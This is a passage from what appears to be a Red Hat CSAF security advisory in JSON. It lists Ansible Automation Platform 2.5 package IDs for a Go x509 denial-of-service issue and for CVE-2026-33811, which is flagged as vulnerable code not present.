"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: golang crypto/x509: Denial of Service via excessive processing of DNS SAN entries"
},
{
"cve": "CVE-2026-33811",
"cwe": {
"id": "CWE-1341",
"name": "Multiple Releases of Same Resource or Handle"
},
"discovery_date": "2026-05-07T20:01:34.913869+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
